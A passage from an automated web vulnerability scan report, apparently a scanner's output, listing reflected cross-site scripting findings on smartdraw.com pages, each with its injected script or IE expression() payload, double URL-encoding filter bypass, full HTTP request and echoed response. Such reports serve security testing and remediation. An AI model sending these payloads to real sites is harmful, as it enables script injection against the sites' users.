<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/buy/4fed4"style="x:expression(alert(1))"152282d3cc2/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

3.129. http://www.smartdraw.com/buy/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /buy/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1baf%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522056ce7adff3 was submitted in the REST URL parameter 2. This input was echoed as c1baf"style="x:expression(alert(1))"056ce7adff3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /buy/x22c1baf%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522056ce7adff3 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:30:05 GMT
Content-Length: 8732
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/
Set-Cookie: ASP.NET_SessionId=dvui0v455qaojrfdct104guc; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:30:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/buy/x22c1baf"style="x:expression(alert(1))"056ce7adff3/" rel="nofollow" target="_blank">
...[SNIP]...

3.130. http://www.smartdraw.com/buy/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /buy/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61661"style%3d"x%3aexpression(alert(1))"aa36938865b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61661"style="x:expression(alert(1))"aa36938865b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /buy/x22?61661"style%3d"x%3aexpression(alert(1))"aa36938865b=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: ASP.NET_SessionId=zuev0255yk14t1frw24v3j55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8753
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/buy/x22/?61661"style="x:expression(alert(1))"aa36938865b=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.131. http://www.smartdraw.com/buy/x22 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /buy/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b9c"style%3d"x%3aexpression(alert(1))"07d1f7b8086 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47b9c"style="x:expression(alert(1))"07d1f7b8086 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /buy/x22?47b9c"style%3d"x%3aexpression(alert(1))"07d1f7b8086=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=sbcbwyb2aq3qzfu15i0dsh55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8753
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/buy/x22/?47b9c"style="x:expression(alert(1))"07d1f7b8086=1" rel="nofollow" target="_blank">
...[SNIP]...

3.132. http://www.smartdraw.com/downloads [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a862%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8fd8df6ce03 was submitted in the REST URL parameter 1. This input was echoed as 2a862"><script>alert(1)</script>8fd8df6ce03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /2a862%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8fd8df6ce03?id=340839/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:32 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=dc5mez55nymwryfaavsylt55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8844
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/2a862"><script>alert(1)</script>8fd8df6ce03/?id=340839/x22/x3eSmartDraw&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidde
...[SNIP]...

3.133. http://www.smartdraw.com/downloads [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96d2c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e26549339e2c was submitted in the REST URL parameter 1. This input was echoed as 96d2c"><script>alert(1)</script>26549339e2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /downloads96d2c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e26549339e2c?id=340839/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/
Set-Cookie: ASP.NET_SessionId=q4uupajw15d2f4bqiizdyum2; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8907
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloads96d2c"><script>alert(1)</script>26549339e2c/?id=340839/x22/x3eSmartDraw" rel="nofollow" target="_blank">
...[SNIP]...

3.134. http://www.smartdraw.com/downloads [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252271fe023e54 was submitted in the REST URL parameter 1. This input was echoed as 6fd6e"style="x:expression(alert(1))"71fe023e54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /downloads6fd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252271fe023e54 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/
Set-Cookie: ASP.NET_SessionId=yyv5x0450piuis45ejmzuryy; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8739
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloads6fd6e"style="x:expression(alert(1))"71fe023e54/" rel="nofollow" target="_blank">
...[SNIP]...

3.135. http://www.smartdraw.com/downloads [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75a12%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228ae5fca1f39 was submitted in the REST URL parameter 1. This input was echoed as 75a12"style="x:expression(alert(1))"8ae5fca1f39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /75a12%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228ae5fca1f39 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:31 GMT
Content-Length: 8683
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: ASP.NET_SessionId=jl33dq55fge2ij55usujg355; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/75a12"style="x:expression(alert(1))"8ae5fca1f39/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

3.136. http://www.smartdraw.com/downloads [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1f7d"><script>alert(1)</script>1bd1fdf7711 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /downloads?id=340839/x22/x3eSmartDrawa1f7d"><script>alert(1)</script>1bd1fdf7711 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:19 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:19 GMT; path=/
Set-Cookie: ASP.NET_SessionId=t1kmf52brnpipl45gqynblnt; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=6D7F9BCA-D794-4445-857B-A18698F1B8C9; expires=Sun, 03-Feb-2041 20:29:19 GMT; path=/
Set-Cookie: TRV=1; expires=Sun, 03-Feb-2041 20:29:19 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12947
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/downloads/index.htm?id=340839/x22/x3eSmartDrawa1f7d"><script>alert(1)</script>1bd1fdf7711" rel="nofollow" target="_blank">
...[SNIP]...

3.137. http://www.smartdraw.com/downloads [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5facb"><script>alert(1)</script>49b68308620 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /downloads?id=5facb"><script>alert(1)</script>49b68308620 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:20 GMT
Content-Length: 12786
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=no3m3ona4ywt5ufehqdinuiv; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=83434CAF-2F0B-4058-B666-16AC15340351; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: TRV=1; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/downloads/index.htm?id=5facb"><script>alert(1)</script>49b68308620&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px;
...[SNIP]...

3.138. http://www.smartdraw.com/downloads [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8433d"><script>alert(1)</script>f5beed3ebcb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /downloads?8433d"><script>alert(1)</script>f5beed3ebcb=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:18 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:18 GMT; path=/
Set-Cookie: ASP.NET_SessionId=bx0e1x45yaxnbvqv5rl1lobn; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=B5B6DB7A-34F1-4878-9BA4-22EAB7B1DC13; expires=Sun, 03-Feb-2041 20:29:18 GMT; path=/
Set-Cookie: TRV=1; expires=Sun, 03-Feb-2041 20:29:18 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12779
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/downloads/index.htm?8433d"><script>alert(1)</script>f5beed3ebcb=1" rel="nofollow" target="_blank">
...[SNIP]...

3.139. http://www.smartdraw.com/downloads [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aec6"><script>alert(1)</script>133a985f46b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /downloads?9aec6"><script>alert(1)</script>133a985f46b=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=eu0eua45v2ntfszry5fsxg45; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=5FEDCD2D-3EF7-4E28-9941-1289D6269030; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: TRV=1; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12779
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/downloads/index.htm?9aec6"><script>alert(1)</script>133a985f46b=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

3.140. http://www.smartdraw.com/downloads/x22 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2601%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522cc75ed19a87 was submitted in the REST URL parameter 1. This input was echoed as b2601"style="x:expression(alert(1))"cc75ed19a87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /downloadsb2601%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522cc75ed19a87/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=gjwvvma5ouzgwz45mccvo0yz; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloadsb2601"style="x:expression(alert(1))"cc75ed19a87/x22/" rel="nofollow" target="_blank">
...[SNIP]...

3.141. http://www.smartdraw.com/downloads/x22 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e0fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c7b5f3c9049 was submitted in the REST URL parameter 1. This input was echoed as 7e0fd"style="x:expression(alert(1))"c7b5f3c9049 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

